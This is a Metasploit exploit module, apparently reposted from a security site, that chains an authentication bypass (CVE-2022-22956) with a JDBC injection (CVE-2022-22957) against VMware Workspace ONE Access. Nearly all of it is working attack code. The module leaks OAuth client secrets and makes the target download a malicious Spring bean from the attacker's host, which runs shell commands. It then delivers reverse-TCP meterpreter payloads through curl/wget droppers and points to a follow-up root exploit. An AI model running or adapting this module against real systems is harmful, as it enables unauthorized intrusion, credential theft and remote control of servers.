### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Exploit::EXEinclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HttpServerinclude Msf::Exploit::CmdStagerprepend Msf::Exploit::Remote::AutoCheckclass InvalidRequest < StandardErrorendclass InvalidResponse < StandardErrorenddef initialize(info = {})super(update_info(info,'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain','Description' => %q{This module combines two vulnerabilities in order achieve remote code execution in the context of the`horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass inOAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass theauthentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBCinjection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attackerto deserialize arbitrary Java objects which can allow remote code execution.},'Author' => ['mr_me', # Discovery & PoC'jheysel-r7' # Metasploit Module],'References' => [['CVE', '2022-22956'],['CVE', '2022-22957'],['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],['URL', 'https://github.com/sourceincite/hekate/'],['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']],'DisclosureDate' => '2022-04-06','License' => MSF_LICENSE,'Platform' => ['unix', 'linux'],'Arch' => [ARCH_CMD, ARCH_X64],'Privileged' => false,'Targets' => [['Unix Command',{'Platform' => 'unix','Arch' => ARCH_CMD,'Type' => :unix_cmd,'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'}}],['Linux Dropper',{'Platform' => 'linux','Arch' => [ARCH_X64],'Type' => :linux_dropper,'CmdStagerFlavor' => %i[curl wget],'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}}]],'Payload' => {'BadChars' => "x22"},'DefaultTarget' => 0,'DefaultOptions' => {'RPORT' => 443,'SSL' => true,'LPORT' => 5555},'Notes' => {'Stability' => [CRASH_SAFE],'Reliability' => [REPEATABLE_SESSION],'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]}))end# The VMware products affected do no expose any version information to unauthenticated users.# Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were# patched in the following VMware update: https://kb.vmware.com/s/article/88099def check@token = get_authentication_tokenExploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')rescue InvalidRequest, InvalidResponse => ereturn Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")end# Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).## Return the authentication tokendef get_authentication_tokenoauth_client = ['Service__OAuth2Client', 'acs'].sampleres_activation_token = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),'method' => 'POST'})unless res_activation_tokenraise InvalidRequest, 'No response from the server when requesting an activation token'endunless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"endactivation_token = res_activation_token.get_json_document['activationToken']res_client_info = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),'method' => 'POST','Content-Type' => 'application/x-www-form-urlencoded','data' => activation_token})unless res_client_inforaise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'endunless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"endjson_client_info = res_client_info.get_json_documentclient_id = json_client_info['client_id']client_secret = json_client_info['client_secret']print_good("Leaked client_id: #{client_id}")print_good("Leaked client_secret: #{client_secret}")post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"res_access_token = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),'method' => 'POST','Content-Type' => 'application/x-www-form-urlencoded','data' => post_data})unless res_access_tokenraise InvalidRequest, 'No response from the server when requesting the access token'endunless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']raise InvalidResponse, 'Invalid response from the server when requesting the access token'endres_access_token.get_json_document['access_token']end# Serve the files for the target machine to download.# If the request to the server ends in .xml the victim is requesting the spring bean generated by payload_xml method.# If the request doesn't in .xml the victim is requesting the linux dropper payload.def on_request_uri(cli, request)vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")if request.to_s.include?('.xml')vprint_status('Sending XML response: ')send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-strem' })vprint_status('Response sent')elsevprint_status('Sending PAYLOAD: ')send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-strem' })endend# Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim## Returns an XML document containing the payload.def generate_payload_xml(cmd)bean = ''builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') dobuilder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') dobuilder.constructor dobuilder.list dobuilder.value('/bin/sh')builder.value('-c')builder.value(cmd)endendendendbean.gsub!('constructor', 'constructor-arg')vprint_status(bean)beanend# Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.def trigger_jdbc_rce(jwt, sub_cmd)# jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{filename}"jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),'method' => 'POST','Content-Type' => 'application/x-www-form-urlencoded','Connection' => 'keep-alive','cookie' => "HZN=#{jwt}",'data' => jdbc_uri})fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless resfail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'enddef execute_command(cmd, opts = {})vprint_status("Executing the following command: #{cmd}")@payload_xml = generate_payload_xml(cmd)trigger_jdbc_rce(opts[:jwt], cmd)end# Instruct the user to exploit CVE-2022-22960def on_new_session(_client)print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')enddef exploitunless @tokenbegin@token = get_authentication_tokenrescue InvalidRequest => efail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")rescue InvalidResponse => efail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")endend@payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'start_service('Path' => "/#{@payload_name}")case target['Type']when :unix_cmdexecute_command(payload.encoded, { jwt: @token })when :linux_dropperexecute_cmdstager({ jwt: @token })elsefail_with(Failure::BadConfig, 'Invalid target specified')endendend
Source: 1600403202-BLW/eussi/moc.ytirucesxc
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
